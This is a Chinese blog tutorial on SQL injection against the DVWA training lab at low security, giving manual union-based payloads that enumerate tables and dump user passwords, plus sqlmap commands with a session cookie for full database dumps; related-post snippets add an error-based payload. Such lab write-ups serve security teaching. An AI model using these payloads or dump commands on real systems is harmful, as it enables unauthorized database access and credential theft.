dvwa sql注入

最新推荐文章于 2024-05-12 12:01:50 发布
最新推荐文章于 2024-05-12 12:01:50 发布
阅读量2.3k 收藏 3
点赞数
分类专栏: SQL 文章标签: sql 数据库 database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62420492/article/details/121943313
版权

dvwa sql (low) 注入

一. 手工注入

  1. 输入1 提交

在这里插入图片描述

  1. 输入1‘ 提交
    在这里插入图片描述

  2. 输入 1 and 1=1提交
    在这里插入图片描述
    4.输入 1 and 1=2提交
    在这里插入图片描述
    由上可以看出是存在注入点的
    sql查询语句: select First name 的列名 and surname 的列名 from 表名 where id的列名 =’w我们输入的id‘

  3. 输入1’ union select 1, databse()#
    在这里插入图片描述

6.输入 1’ union select1,table_name from information_schema.tables where table_name=‘dvwa’#
在这里插入图片描述

7.输入 1‘ union select1, column_name from information_schema.columns where table_name=‘users’#
在这里插入图片描述
8.输入1’ union select1,concat(user,password) from user#
在这里插入图片描述

二.利用sqlmap注入
1.找注入点 先输入1,返回正常
再输入1’ 报错,返回
在这里插入图片描述
可以判断除sql注入漏洞,使用sqlmap进行注入攻击
2. 在命令行中输入python sqlmap.py -u “localhost:82/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit”
在这里插入图片描述
3.sqlmap got a 302 redirect to ‘http://localhost:82/DVWA-master/login.php’. Do you want to follow? [Y/n]
回答Y

在这里插入图片描述
4.python sqlmap.py -u “localhost:82/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie “F12→→Console→→document.cookie得到当前页面cookie”
cookie为"security=low; PHPSESSID=971ue9m81hgo1d54e43t4umpj3"
在这里插入图片描述
5.python sqlmap.py -u “~~~” --cookie
–dbs 参数可以得到所有数据库
#available databases [6]:
[] dvwa
[] information_schema
[] mysql
[] performance_schema
[] phpmyadmin
[] test

6.python sqlmap.py -u “~~~” --cookie --current-db
可以得到当前使用的数据库
#current database:‘dvwa’
7.python sqlmap.py -u --cookie --table-D
得到dvwa数据库下的表
8.–columns-T" " -D" "
可以得到dvwa数据库下面的表users下面的columns
9.–dump -C" " -T " "-D " "
可以得到dvwa 数据库 下面的表users 下面的columns的具体值

小杨想睡觉.
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
DVWAsql注入——联合注入和报错注入
Williamanddog的博客
12-20 1794
构造payload:1' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1)))#使用格式:updatexml(xml_document,xpath_string,new_value),作用是将document的中符合string 的字符串替换为value的值。
DVWA-SQL注入
acdcccc的博客
08-26 301
分享DVWA靶场的SQL注入过程
DVWA通过攻略之SQL注入_dvwa sql注入(1)
最新发布
2401_84968303的博客
05-12 1066
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
注入工具SQLMAP教程:Tamper编写;指纹修改;高权限操作;目录架构等
wushangyu32335的博客
02-21 1573
1、SQLMAP-常规猜解&字典配置 2、SQLMAP-权限操作&文件命令 3、SQLMAP-Tamper&使用&开发 4、SQLMAP-调试指纹&风险等级
Sqlmap
mumuzi2的博客
02-25 383
下载地址: http://sqlmap.org/ 需要环境: python 使用方法:
使用sqlmap总是提示需要302跳转重新登录的解决方法
wutiangui的博客
10-01 366
如果给了cookie但发现还是提示需要重新登录,且按它给的提示发现还是找不到注入点,原因是url没有加引号。如果在命令中不指定cookie,sqlmap在执行时会提示需要重新登录。url加了双引号后解决问题。
DVWA下的SQL注入
07-25
SQL
DVWASQL注入详解(包含知识点)
10-20
该文档是使用DVWA平台进行的SQL注入(low)级别的详细操作和知识点分析,包括什么是SQL注入,如何进行SQL注入,图文并茂,包含了几个非常不错的操作,解决了各种问题。
sql注入渗透测试工具:sqlol/DVWA
04-24
sql注入渗透测试工具:sqlol/DVWA https://xianjie0318.blog.csdn.net/article/details/112987555?spm=1001.2014.3001.5502
2.SQL注入.md
05-31
玄魂磐石计划课程陈殷课件 常用SQL注入操作,基于DVWA漏洞系统源码分析 --------------------------------- md文件
db2 sql错误代码 -302
热门推荐
舞动de人生
11-07 5万+
SQL0302N  在 EXECUTE 或 OPEN 语句中的主变量值对于其相应的使用而       言过大。 说明: 发现输入主变量的值对于其在 SELECT、VALUES 或预编译语句中的使用而言太大 。发生了下列情况之一: *  SQL 语句中使用的相应主变量或参数标记被定义为字符串,但是输入主变量包    含的字符串太长。
dvwa——sql注入
qq_45487671的博客
05-26 2585
SQL注入攻击实验 1.实验目的 (1)理解SQL注入的原理; (2)学习手工注入的过程; (3)掌握SQL注入工具的使用; (4)掌握SQL注入的防御技术。 2.实验要求 1、登陆DVWA平台,结合所学SQL注入漏洞的基本知识,爆出MYSQL版本号、安装路径等信息;最终爆出当前使用的数据库名称、数据表名称、字段名称、以及关键的字段值(比如用户名、密码等)。 2、DVWA安全级别设置为“Low”或者“Medium”,均可。 3.实验过程描述 1、判断是否存在SQL注入点。 id值输入1,发现正常显示 输入
【重定向302】Redirect
秃头披风侠的博客
02-27 4560
介绍了重定向,如何使用HttpServletResponse进行重定向
DVWA通关--Brute Force(暴力破解)
箭雨镜屋
07-20 1503
按照我的理解,暴力破解的成功概率,一方面取决于被攻击系统是否有防暴力破解机制,防暴力破解机制是否高效,另一方面取决于攻击者的字典以及计算机性能。 本文主要目的是分析防暴力破解机制是否有效,以及如何绕过某些防暴力破解机制,因此,出于节省时间的目的,会使用包含正确答案的比较小的用户名密码字典,仅作示范。 LOW 通关思路 1、首先观察页面,发现只要输入的用户名或者密码有一个错误,就回显“Username and/or password incorrect.”,并且尝试了6次用admin用户登录,6次都输
Hydra dvwa brute force使用小记
无心插柳
08-14 2万+
详细分解Hydra用于测试 DVWA Brute Force模块, 清晰解析了如何使用Hydra来进行http的暴力美学破解
302重定向
飞翔的熊blabla
09-26 998
302重定向又称之为302代表暂时性转移(Temporarily Moved ),英文名称:302 redirect。 也被认为是暂时重定向(temporary redirect),一条对网站浏览器的指令来显示浏览器被要求显示的不同的URL,当一个网页经历过短期的URL的变化时使用。一个暂时重定向是一种服务器端的重定向,能够被搜索引擎蜘蛛正确地处理。 中文名 302重定
DVWA 初次尝试(上)
borrrrring的博客
11-23 528
Brute Force(暴力破解) Low 分析源码,我们可以看到这里没有做任何防御。 有两种方法可以破解。 第一种,是使用burpsuit直接进行爆破,爆破出密码进行登陆 长度与其它长度不同,所以password极有可能是正确的密码。 第二种,我们在源码中看到了sql语句,可以通过构造sql语句来进行破解 SELECT * FROM users WHERE user = ‘user′ANDpassword=′user' AND password = 'user′ANDpassword=′pass’

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值